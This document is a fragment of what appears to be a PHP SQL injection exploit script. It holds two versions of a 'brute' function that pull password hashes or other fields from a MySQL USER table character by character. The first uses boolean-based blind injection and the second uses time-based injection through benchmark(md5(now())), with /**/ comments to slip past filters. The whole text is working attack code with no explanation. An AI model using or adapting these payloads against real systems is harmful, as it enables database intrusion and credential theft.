function brute($User_id, $table) { $ret_str = ""; for ($i = 1; $i < 43; $i++) { print "[+] Brute {$i} symbol...\n"; for ($j = 42; $j < 123; $j++) { $q = "'/**/OR/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/{$table}/**/FROM/**/USER/**/limit/**/{$User_id},1),{$i},1))))={$j},1,0)/*"; if (http_connect($q)) { $ret_str = $ret_str . chr($j); print chr($j) . "\n"; break; } print "."; if ($j == 57) { $j = 96; } if ($j == 42) { $j = 47; } } if ($j == 123) { break; } } return $ret_str; }
function brute($User_id, $table) { $ret_str = ""; if ($table == "Password") { $b_str = "*1234567890abcdef"; } else { $b_str = "1abcdefghijklmnopqrstuvwxyz_234567890 !'#%&()*+,-./:;<=>?@[\\]^{|}~à áâãäåæçèéêëìÃîïðñòóôõö÷øùúûüýþÿž"; } $b_arr = str_split($b_str); for ($i = 1; $i < 43; $i++) { print "[+] Brute {$i} symbol...\n"; for ($j = 0; $j < count($b_arr); $j++) { $brute = ord($b_arr[$j]); $q = "/**/AND/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/{$table}/**/FROM/**/USER/**/limit/**/{$User_id},1),{$i},1))))={$brute},benchmark(1,benchmark(2000000,md5(now()))),0)"; if (http_connect($q)) { $ret_str = $ret_str . $b_arr[$j]; print $b_arr[$j] . "\n"; break; } print "."; } if ($j == count($b_arr)) { break; } } return $ret_str; }